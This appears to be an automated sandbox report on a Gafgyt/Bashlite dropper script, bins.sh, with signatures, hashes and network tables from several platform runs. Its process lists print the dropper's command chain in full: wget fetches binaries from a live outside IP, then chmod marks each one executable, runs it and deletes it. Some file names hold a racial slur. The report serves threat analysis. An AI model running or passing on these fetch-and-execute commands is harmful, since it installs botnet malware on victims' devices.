Analysis Overview
SHA256
de36953ab2dd21eecd40090cdc4bdd7add909897c8835f20742df47d413cf7d3
Threat Level: Known bad
The file bins.sh was found to be: Known bad.
Malicious Activity Summary
Detected Gafgyt variant
Gafgyt/Bashlite
Executes dropped EXE
Reads system routing table
Reads system network configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-03 04:52
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-03 04:52
Reported
2024-08-03 04:54
Platform
debian9-mipsbe-20240418-en
Max time kernel
92s
Max time network
16s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/boobs | /tmp/boobs | N/A |
| N/A | /tmp/boobs2 | /tmp/boobs2 | N/A |
| N/A | /tmp/roof | /tmp/roof | N/A |
| N/A | /tmp/ppc | /tmp/ppc | N/A |
| N/A | /tmp/sparc | /tmp/sparc | N/A |
| N/A | /tmp/darkness | /tmp/darkness | N/A |
| N/A | /tmp/arm5 | /tmp/arm5 | N/A |
| N/A | /tmp/arm6 | /tmp/arm6 | N/A |
| N/A | /tmp/NIGGA7 | /tmp/NIGGA7 | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/boobs | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/boobs | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boobs | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boobs2 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/roof | /usr/bin/wget | N/A |
| File opened for modification | /tmp/sparc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/darkness | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/NIGGA7 | /usr/bin/wget | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/usr/bin/wget
[wget http://93.123.85.216/boobs]
/bin/chmod
[chmod +x boobs]
/tmp/boobs
[./boobs]
/bin/rm
[rm -rf boobs]
/usr/bin/wget
[wget http://93.123.85.216/boobs2]
/bin/chmod
[chmod +x boobs2]
/tmp/boobs2
[./boobs2]
/bin/rm
[rm -rf boobs2]
/usr/bin/wget
[wget http://93.123.85.216/roof]
/bin/chmod
[chmod +x roof]
/tmp/roof
[./roof]
/bin/rm
[rm -rf roof]
/usr/bin/wget
[wget http://93.123.85.216/ppc]
/bin/chmod
[chmod +x ppc]
/tmp/ppc
[./ppc]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://93.123.85.216/sparc]
/bin/chmod
[chmod +x sparc]
/tmp/sparc
[./sparc]
/bin/rm
[rm -rf sparc]
/usr/bin/wget
[wget http://93.123.85.216/darkness]
/bin/chmod
[chmod +x darkness]
/tmp/darkness
[./darkness]
/bin/rm
[rm -rf darkness]
/usr/bin/wget
[wget http://93.123.85.216/arm5]
/bin/chmod
[chmod +x arm5]
/tmp/arm5
[./arm5]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://93.123.85.216/arm6]
/bin/chmod
[chmod +x arm6]
/tmp/arm6
[./arm6]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://93.123.85.216/NIGGA7]
/bin/chmod
[chmod +x NIGGA7]
/tmp/NIGGA7
[./NIGGA7]
/bin/rm
[rm -rf NIGGA7]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | tcp | |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
Files
/tmp/boobs
| MD5 | 1f918589efbef4b04e806b7a38fc63f8 |
| SHA1 | 758f7a47b66a52ce59462ffd1c0f223af618077c |
| SHA256 | 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4 |
| SHA512 | d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb |
/tmp/boobs2
| MD5 | 348a8f1c5535fe6a0a698f457c329485 |
| SHA1 | a3415c48c1d18776ab9a02ef23fe65cef88af354 |
| SHA256 | c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8 |
| SHA512 | e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c |
/tmp/roof
| MD5 | ca477454b7145f6d2180e32c6f0135f6 |
| SHA1 | da25e63ea1e5fed9abf321ddf4a82eaa76717bb6 |
| SHA256 | 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4 |
| SHA512 | 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80 |
/tmp/ppc
| MD5 | 5cf85a36699cca11be8c96c3232654e0 |
| SHA1 | 897379599414d22c9adf9b542266eb6b888b6542 |
| SHA256 | d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419 |
| SHA512 | de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552 |
/tmp/sparc
| MD5 | 0e2c431d0b76d5d91af24cd90532cd93 |
| SHA1 | 402554d878c7e73cdf145bb249c604a21e465e1f |
| SHA256 | 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257 |
| SHA512 | 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc |
/tmp/darkness
| MD5 | 24393febb5e8a233a8df7f00b8c3b147 |
| SHA1 | f8240c5256c8a193ee8f2f93880203eca2f827d5 |
| SHA256 | 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42 |
| SHA512 | be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6 |
/tmp/arm5
| MD5 | e57c0097d80d17a52aad01a8c2e4f9fc |
| SHA1 | fffadcdb51b879236df4d4cdf373216dd926e90e |
| SHA256 | 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a |
| SHA512 | 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464 |
/tmp/arm6
| MD5 | 1e78f279e22858585947a52ad8b127d7 |
| SHA1 | 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7 |
| SHA256 | 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377 |
| SHA512 | 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921 |
/tmp/NIGGA7
| MD5 | 658e8ab8f1bf7db543aa9b2b2fd595ce |
| SHA1 | ce122d9bc9920bbd77826fcd7676f3081ec19752 |
| SHA256 | 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c |
| SHA512 | eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f |
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-03 04:52
Reported
2024-08-03 04:54
Platform
debian9-mipsel-20240729-en
Max time kernel
92s
Max time network
14s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/boobs | /tmp/boobs | N/A |
| N/A | /tmp/boobs2 | /tmp/boobs2 | N/A |
| N/A | /tmp/roof | /tmp/roof | N/A |
| N/A | /tmp/ppc | /tmp/ppc | N/A |
| N/A | /tmp/sparc | /tmp/sparc | N/A |
| N/A | /tmp/darkness | /tmp/darkness | N/A |
| N/A | /tmp/arm5 | /tmp/arm5 | N/A |
| N/A | /tmp/arm6 | /tmp/arm6 | N/A |
| N/A | /tmp/NIGGA7 | /tmp/NIGGA7 | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/boobs2 | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/boobs2 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/roof | /usr/bin/wget | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/sparc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/darkness | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boobs | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boobs2 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/NIGGA7 | /usr/bin/wget | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/usr/bin/wget
[wget http://93.123.85.216/boobs]
/bin/chmod
[chmod +x boobs]
/tmp/boobs
[./boobs]
/bin/rm
[rm -rf boobs]
/usr/bin/wget
[wget http://93.123.85.216/boobs2]
/bin/chmod
[chmod +x boobs2]
/tmp/boobs2
[./boobs2]
/bin/rm
[rm -rf boobs2]
/usr/bin/wget
[wget http://93.123.85.216/roof]
/bin/chmod
[chmod +x roof]
/tmp/roof
[./roof]
/bin/rm
[rm -rf roof]
/usr/bin/wget
[wget http://93.123.85.216/ppc]
/bin/chmod
[chmod +x ppc]
/tmp/ppc
[./ppc]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://93.123.85.216/sparc]
/bin/chmod
[chmod +x sparc]
/tmp/sparc
[./sparc]
/bin/rm
[rm -rf sparc]
/usr/bin/wget
[wget http://93.123.85.216/darkness]
/bin/chmod
[chmod +x darkness]
/tmp/darkness
[./darkness]
/bin/rm
[rm -rf darkness]
/usr/bin/wget
[wget http://93.123.85.216/arm5]
/bin/chmod
[chmod +x arm5]
/tmp/arm5
[./arm5]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://93.123.85.216/arm6]
/bin/chmod
[chmod +x arm6]
/tmp/arm6
[./arm6]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://93.123.85.216/NIGGA7]
/bin/chmod
[chmod +x NIGGA7]
/tmp/NIGGA7
[./NIGGA7]
/bin/rm
[rm -rf NIGGA7]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | tcp | |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
Files
/tmp/boobs
| MD5 | 1f918589efbef4b04e806b7a38fc63f8 |
| SHA1 | 758f7a47b66a52ce59462ffd1c0f223af618077c |
| SHA256 | 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4 |
| SHA512 | d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb |
/tmp/boobs2
| MD5 | 348a8f1c5535fe6a0a698f457c329485 |
| SHA1 | a3415c48c1d18776ab9a02ef23fe65cef88af354 |
| SHA256 | c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8 |
| SHA512 | e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c |
/tmp/roof
| MD5 | ca477454b7145f6d2180e32c6f0135f6 |
| SHA1 | da25e63ea1e5fed9abf321ddf4a82eaa76717bb6 |
| SHA256 | 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4 |
| SHA512 | 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80 |
/tmp/ppc
| MD5 | 5cf85a36699cca11be8c96c3232654e0 |
| SHA1 | 897379599414d22c9adf9b542266eb6b888b6542 |
| SHA256 | d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419 |
| SHA512 | de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552 |
/tmp/sparc
| MD5 | 0e2c431d0b76d5d91af24cd90532cd93 |
| SHA1 | 402554d878c7e73cdf145bb249c604a21e465e1f |
| SHA256 | 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257 |
| SHA512 | 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc |
/tmp/darkness
| MD5 | 24393febb5e8a233a8df7f00b8c3b147 |
| SHA1 | f8240c5256c8a193ee8f2f93880203eca2f827d5 |
| SHA256 | 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42 |
| SHA512 | be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6 |
/tmp/arm5
| MD5 | e57c0097d80d17a52aad01a8c2e4f9fc |
| SHA1 | fffadcdb51b879236df4d4cdf373216dd926e90e |
| SHA256 | 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a |
| SHA512 | 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464 |
/tmp/arm6
| MD5 | 1e78f279e22858585947a52ad8b127d7 |
| SHA1 | 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7 |
| SHA256 | 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377 |
| SHA512 | 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921 |
/tmp/NIGGA7
| MD5 | 658e8ab8f1bf7db543aa9b2b2fd595ce |
| SHA1 | ce122d9bc9920bbd77826fcd7676f3081ec19752 |
| SHA256 | 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c |
| SHA512 | eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-03 04:52
Reported
2024-08-03 04:54
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
103s
Max time network
128s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/boobs | /tmp/boobs | N/A |
| N/A | /tmp/boobs2 | /tmp/boobs2 | N/A |
| N/A | /tmp/roof | /tmp/roof | N/A |
| N/A | /tmp/ppc | /tmp/ppc | N/A |
| N/A | /tmp/sparc | /tmp/sparc | N/A |
| N/A | /tmp/darkness | /tmp/darkness | N/A |
| N/A | /tmp/arm5 | /tmp/arm5 | N/A |
| N/A | /tmp/arm6 | /tmp/arm6 | N/A |
| N/A | /tmp/NIGGA7 | /tmp/NIGGA7 | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/roof | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/roof | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boobs2 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/sparc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boobs | /usr/bin/wget | N/A |
| File opened for modification | /tmp/roof | /usr/bin/wget | N/A |
| File opened for modification | /tmp/darkness | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/NIGGA7 | /usr/bin/wget | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/usr/bin/wget
[wget http://93.123.85.216/boobs]
/bin/chmod
[chmod +x boobs]
/tmp/boobs
[./boobs]
/bin/rm
[rm -rf boobs]
/usr/bin/wget
[wget http://93.123.85.216/boobs2]
/bin/chmod
[chmod +x boobs2]
/tmp/boobs2
[./boobs2]
/bin/rm
[rm -rf boobs2]
/usr/bin/wget
[wget http://93.123.85.216/roof]
/bin/chmod
[chmod +x roof]
/tmp/roof
[./roof]
/bin/rm
[rm -rf roof]
/usr/bin/wget
[wget http://93.123.85.216/ppc]
/bin/chmod
[chmod +x ppc]
/tmp/ppc
[./ppc]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://93.123.85.216/sparc]
/bin/chmod
[chmod +x sparc]
/tmp/sparc
[./sparc]
/bin/rm
[rm -rf sparc]
/usr/bin/wget
[wget http://93.123.85.216/darkness]
/bin/chmod
[chmod +x darkness]
/tmp/darkness
[./darkness]
/bin/rm
[rm -rf darkness]
/usr/bin/wget
[wget http://93.123.85.216/arm5]
/bin/chmod
[chmod +x arm5]
/tmp/arm5
[./arm5]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://93.123.85.216/arm6]
/bin/chmod
[chmod +x arm6]
/tmp/arm6
[./arm6]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://93.123.85.216/NIGGA7]
/bin/chmod
[chmod +x NIGGA7]
/tmp/NIGGA7
[./NIGGA7]
/bin/rm
[rm -rf NIGGA7]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | tcp | |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| GB | 195.181.164.14:443 | tcp | |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
Files
/tmp/boobs
| MD5 | 1f918589efbef4b04e806b7a38fc63f8 |
| SHA1 | 758f7a47b66a52ce59462ffd1c0f223af618077c |
| SHA256 | 267bb586e092048c02e1533df5594bcdcb7d7bc45e1d7c249b624732af65b2b4 |
| SHA512 | d3d22ba6f725b0a02abd78ab62dd231b95ef17ed69376c836ab03bfc78f9e2c841b283c8eb0ee3adb4d4e7785b003afbd76197e965a6c2f09ed773d723132cbb |
/tmp/boobs2
| MD5 | 348a8f1c5535fe6a0a698f457c329485 |
| SHA1 | a3415c48c1d18776ab9a02ef23fe65cef88af354 |
| SHA256 | c11cdb76aa08f72fd9624c68a74776342c8eec86075bcfeca88c83d5d830c0e8 |
| SHA512 | e3ef6a9edc6f59eea05403785ef2bef8005248d0ec4f8714e733c1c895a6bd267e6f44c9409c4cd877a3b48dd92e7715ea00dec1e95193833234df0245e4991c |
/tmp/roof
| MD5 | ca477454b7145f6d2180e32c6f0135f6 |
| SHA1 | da25e63ea1e5fed9abf321ddf4a82eaa76717bb6 |
| SHA256 | 6a9406b7230fd0f2b6471bc341dba064b48959aa46e51759c3fafebd50e837d4 |
| SHA512 | 561199819d8b51d51abc6a3fb786f45c28d5b04904efec549fddc4f35b36a45a66c54fb44d4a2f5c1139374c0f3bdd52f3abd565d67e383c25d338193e699d80 |
/tmp/ppc
| MD5 | 5cf85a36699cca11be8c96c3232654e0 |
| SHA1 | 897379599414d22c9adf9b542266eb6b888b6542 |
| SHA256 | d0fa6a48fc3767aa569af289cdd06699c183839f942465540a2bdc112e151419 |
| SHA512 | de9e55d3fec5bcb0791922ff7e2fc1addd8e76e83ad3a018cdd67cf3ddde2cc09571a520349361acf9024123ba5976bd68f1aaeec82693103149290bff6be552 |
/tmp/sparc
| MD5 | 0e2c431d0b76d5d91af24cd90532cd93 |
| SHA1 | 402554d878c7e73cdf145bb249c604a21e465e1f |
| SHA256 | 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257 |
| SHA512 | 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc |
/tmp/darkness
| MD5 | 24393febb5e8a233a8df7f00b8c3b147 |
| SHA1 | f8240c5256c8a193ee8f2f93880203eca2f827d5 |
| SHA256 | 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42 |
| SHA512 | be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6 |
/tmp/arm5
| MD5 | e57c0097d80d17a52aad01a8c2e4f9fc |
| SHA1 | fffadcdb51b879236df4d4cdf373216dd926e90e |
| SHA256 | 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a |
| SHA512 | 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464 |
/tmp/arm6
| MD5 | 1e78f279e22858585947a52ad8b127d7 |
| SHA1 | 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7 |
| SHA256 | 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377 |
| SHA512 | 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921 |
/tmp/NIGGA7
| MD5 | 658e8ab8f1bf7db543aa9b2b2fd595ce |
| SHA1 | ce122d9bc9920bbd77826fcd7676f3081ec19752 |
| SHA256 | 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c |
| SHA512 | eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-03 04:52
Reported
2024-08-03 04:54
Platform
debian9-armhf-20240611-en
Max time kernel
101s
Max time network
17s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/boobs | /tmp/boobs | N/A |
| N/A | /tmp/boobs2 | /tmp/boobs2 | N/A |
| N/A | /tmp/roof | /tmp/roof | N/A |
| N/A | /tmp/ppc | /tmp/ppc | N/A |
| N/A | /tmp/sparc | /tmp/sparc | N/A |
| N/A | /tmp/darkness | /tmp/darkness | N/A |
| N/A | /tmp/arm5 | /tmp/arm5 | N/A |
| N/A | /tmp/arm6 | /tmp/arm6 | N/A |
| N/A | /tmp/NIGGA7 | /tmp/NIGGA7 | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/darkness | N/A |
| File opened for reading | /proc/net/route | /tmp/arm5 | N/A |
| File opened for reading | /proc/net/route | /tmp/arm6 | N/A |
| File opened for reading | /proc/net/route | /tmp/NIGGA7 | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/darkness | N/A |
| File opened for reading | /proc/net/route | /tmp/arm5 | N/A |
| File opened for reading | /proc/net/route | /tmp/arm6 | N/A |
| File opened for reading | /proc/net/route | /tmp/NIGGA7 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boobs | /usr/bin/wget | N/A |
| File opened for modification | /tmp/roof | /usr/bin/wget | N/A |
| File opened for modification | /tmp/ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boobs2 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/sparc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/darkness | /usr/bin/wget | N/A |
| File opened for modification | /tmp/arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/NIGGA7 | /usr/bin/wget | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/usr/bin/wget
[wget http://93.123.85.216/boobs]
/bin/chmod
[chmod +x boobs]
/tmp/boobs
[./boobs]
/bin/rm
[rm -rf boobs]
/usr/bin/wget
[wget http://93.123.85.216/boobs2]
/bin/chmod
[chmod +x boobs2]
/tmp/boobs2
[./boobs2]
/bin/rm
[rm -rf boobs2]
/usr/bin/wget
[wget http://93.123.85.216/roof]
/bin/chmod
[chmod +x roof]
/tmp/roof
[./roof]
/bin/rm
[rm -rf roof]
/usr/bin/wget
[wget http://93.123.85.216/ppc]
/bin/chmod
[chmod +x ppc]
/tmp/ppc
[./ppc]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://93.123.85.216/sparc]
/bin/chmod
[chmod +x sparc]
/tmp/sparc
[./sparc]
/bin/rm
[rm -rf sparc]
/usr/bin/wget
[wget http://93.123.85.216/darkness]
/bin/chmod
[chmod +x darkness]
/tmp/darkness
[./darkness]
/bin/rm
[rm -rf darkness]
/usr/bin/wget
[wget http://93.123.85.216/arm5]
/bin/chmod
[chmod +x arm5]
/tmp/arm5
[./arm5]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://93.123.85.216/arm6]
/bin/chmod
[chmod +x arm6]
/tmp/arm6
[./arm6]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://93.123.85.216/NIGGA7]
/bin/chmod
[chmod +x NIGGA7]
/tmp/NIGGA7
[./NIGGA7]
/bin/rm
[rm -rf NIGGA7]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
| NL | 93.123.85.216:39 | tcp | |
| NL | 93.123.85.216:80 | 93.123.85.216 | tcp |
